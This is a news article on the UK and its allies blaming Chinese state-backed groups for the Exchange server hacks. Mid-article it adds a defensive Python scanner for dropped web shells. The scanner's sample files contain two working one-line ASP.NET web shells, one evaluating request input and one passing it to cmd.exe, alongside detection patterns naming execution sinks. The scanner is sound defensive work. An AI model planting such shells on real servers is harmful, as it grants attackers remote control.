UK holds China responsible for Exchange server hacks

At least 30,000 organisations across the United States were compromised earlier this year through four security bugs in Microsoft Exchange server email software

The UK and its allies have formally attributed the Microsoft Exchange hack to Chinese state-backed groups.

In a detailed post on Monday, the UK's National Cyber Security Centre (NCSC) said threat actors affiliated with the Chinese government were 'responsible for gaining access to computer networks around the world via Microsoft Exchange servers.'

The NCSC said, 'it was highly likely that the China-backed HAFNIUM group was responsible for the activity.'

"The attack on Microsoft Exchange servers is another serious example of a malicious act by Chinese state-backed actors in cyberspace," NCSC Director of Operations Paul Chichester said.

"This kind of behaviour is completely unacceptable, and alongside our partners we will not hesitate to call it out when we see it."

Foreign Secretary Dominic Raab described the attacks as "a reckless but familiar pattern of behaviour".

He urged the Chinese government to end what he called "systematic cyber sabotage," or it should "expect to be held to account if it does not".

Attackers targeted Microsoft Exchange Server email software earlier this year, exploiting four security flaws to affect at least 30,000 organisations in the USA alone.

Security researcher Brian Krebs said a Chinese espionage group seeded "hundreds of thousands" of organisations worldwide with tools that gave the attackers "total, remote control over affected systems".

In each incident, the attackers left behind a web shell: a small, password-protected script written to the server's web directory that can be reached over the Internet from any browser and gives the attacker administrative control of the victim's server.

Microsoft released security updates to address the bugs on 2nd March and advised customers running Exchange Server to apply them as soon as possible. The updates also prompted the 'Hafnium' threat group to step up its attacks on servers that were still unpatched. Patching closes the four flaws but does not remove a web shell that was planted before the update was applied, so organisations also needed to check their servers for signs of existing compromise.
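The web shells described above are ordinary server-side script files dropped into the Exchange web directories, so a first-pass check for existing compromise is to scan those directories for scripts that take input from the HTTP request and pass it to something that executes it. The following scanner is an added example written for this article, not a tool from Microsoft, the NCSC or any incident report. The sample web root it builds is constructed in a temporary directory, the file names and contents are invented, and the detection patterns are generic indicators of one-line ASP.NET web shells rather than a signature for any specific reported sample.

```python
"""Scan ASP.NET web directories for files that look like dropped web shells."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# A file is reported when it both reads attacker-controlled input from the
# HTTP request and hands data to an execution sink. These patterns are
# generic indicators written for this example, not a copy of any real sample.
INPUT_FROM_REQUEST = re.compile(
    r'Request\s*(?:\[|\.Item\s*\[|\.Form\s*\[|\.QueryString\s*\[|\.Params\s*\[)',
    re.IGNORECASE,
)
EXECUTION_SINKS = {
    "script eval": re.compile(r'\beval\s*\(', re.IGNORECASE),
    "process launch": re.compile(
        r'Process\.Start\s*\(|cmd\.exe|powershell(?:\.exe)?', re.IGNORECASE
    ),
    "dynamic assembly load": re.compile(r'Assembly\.Load\s*\(', re.IGNORECASE),
}
# Server-side script types that IIS will execute when requested by a browser.
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}


def classify(text: str) -> list[str]:
    """Return the execution sinks reachable from request input, or [] if benign."""
    if not INPUT_FROM_REQUEST.search(text):
        return []
    return [name for name, rx in EXECUTION_SINKS.items() if rx.search(text)]


def scan_directory(root: Path) -> dict[str, list[str]]:
    """Walk a web root; return {relative path: [reasons]} for suspicious scripts."""
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        reasons = classify(text)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


# Constructed sample web root (invented names and contents, not incident data).
SAMPLE_FILES = {
    # Legitimate page: reads a request parameter but never executes it.
    "owa/auth/logon.aspx": (
        '<%@ Page Language="C#" %>\n'
        '<% string lang = Request["lang"] ?? "en"; %>\n'
        "<html><body>Sign in</body></html>\n"
    ),
    # One-line JScript shell: evaluates whatever the request body contains.
    "owa/auth/help.aspx": (
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>'
    ),
    # Command shell: launches cmd.exe with an argument taken from the request.
    "ecp/about.aspx": (
        '<%@ Page Language="C#" %>\n'
        '<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>\n'
    ),
    # Non-script files are ignored even when they mention suspicious strings.
    "ecp/readme.txt": "Run powershell.exe to regenerate these pages.\n",
}


def build_sample_root() -> Path:
    """Write the constructed sample files into a fresh temporary directory."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def demo() -> dict[str, list[str]]:
    """Build the sample web root and scan it."""
    return scan_directory(build_sample_root())


if __name__ == "__main__":
    for rel_path, reasons in demo().items():
        print(f"{rel_path}: {', '.join(reasons)}")
```

Run against a real server, point `scan_directory` at the IIS web roots Exchange serves (for example the OWA and ECP virtual directories) and compare anything it reports against the files that shipped with the installed Exchange build; a hit on a file with a recent modification time that is not part of the product is the signal to start incident response rather than simply delete the file.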

Holding to account

In addition to the Exchange Server attacks, the UK government has also attributed the activity of the groups that researchers have dubbed 'APT40' and 'APT31' to the Chinese Ministry of State Security.

The government said there is credible evidence to suggest that sustained and irresponsible cyber activity continues to emanate from China.

The Biden administration has said in a statement that attacks launched by China-backed groups had resulted in 'significant remediation costs for its mostly private sector victims.'

'We have raised our concerns about both this incident and the [People's Republic of China's] broader malicious cyber activity with senior PRC Government officials, making clear that the PRC's actions threaten security, confidence, and stability in cyberspace,' the statement added.

The Australian government said it was seriously concerned about reports from its allies that China's Ministry of State Security was 'engaging contract hackers who have carried out cyber-enabled intellectual property theft for personal gain and to provide commercial advantage to the Chinese Government.'

'Australia calls on all countries - including China - to act responsibly in cyberspace,' it added.